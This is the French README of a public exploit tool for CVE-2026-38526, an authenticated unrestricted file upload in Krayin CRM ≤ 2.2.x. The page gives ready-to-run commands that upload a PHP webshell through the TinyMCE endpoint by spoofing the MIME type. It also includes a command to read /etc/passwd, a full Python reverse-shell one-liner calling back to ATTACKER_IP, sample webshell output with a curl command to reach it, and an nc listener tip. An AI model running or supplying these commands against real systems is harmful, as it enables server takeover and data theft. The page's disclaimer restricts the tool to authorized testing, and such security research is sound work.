
Exploit automatisé pour Krayin CRM ≤ 2.2.x.
Exploit automatisé pour Krayin CRM ≤ 2.2.x. Ce script exploite une vulnérabilité de téléversement de fichiers sans restriction dans le point de terminaison TinyMCE (/admin/tinymce/upload), contourne la validation du type MIME en usurpant image/jpeg, téléverse un webshell PHP et exécute des commandes arbitraires avec les privilèges du serveur web.
| Propriété | Valeur |
|---|---|
| ID CVE | CVE-2026-38526 |
| Logiciel concerné | Krayin CRM ≤ 2.2.x |
| Type de vulnérabilité | Téléversement de fichiers sans restriction → Exécution de code à distance |
| Authentification | Requise (n'importe quel compte admin valide) |
| Point de terminaison | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload avec un type MIME usurpé[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Échec de l'authentification : Vérifiez que les identifiants sont corrects et que le compte existe sur la cible.
Échec de l'extraction du jeton CSRF : Assurez-vous que la cible exécute une version vulnérable de Krayin CRM et que le point de terminaison de connexion est accessible.
Le reverse shell ne se connecte pas : Assurez-vous que votre listener est actif (nc -lvnp <PORT>), que les règles du pare-feu autorisent les connexions sortantes et que l'IP/le port de la charge utile sont corrects.
Cet outil est fourni strictement pour des tests de sécurité autorisés et à des fins éducatives uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs sont seuls responsables de s'assurer qu'ils disposent d'une autorisation appropriée avant de tester tout système cible. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
b0nyo - Implémentation du PoC
TREXNEGRO - Découverte de la vulnérabilité
| Option | Description | Exemple |
|---|
-i | URL cible (avec ou sans http://) | http://target.com ou target.com |
-u | E-mail/identifiant admin | [email protected] |
-p | Mot de passe admin | AdminPassword123! |
-c | Commande à exécuter (par défaut : id) | whoami |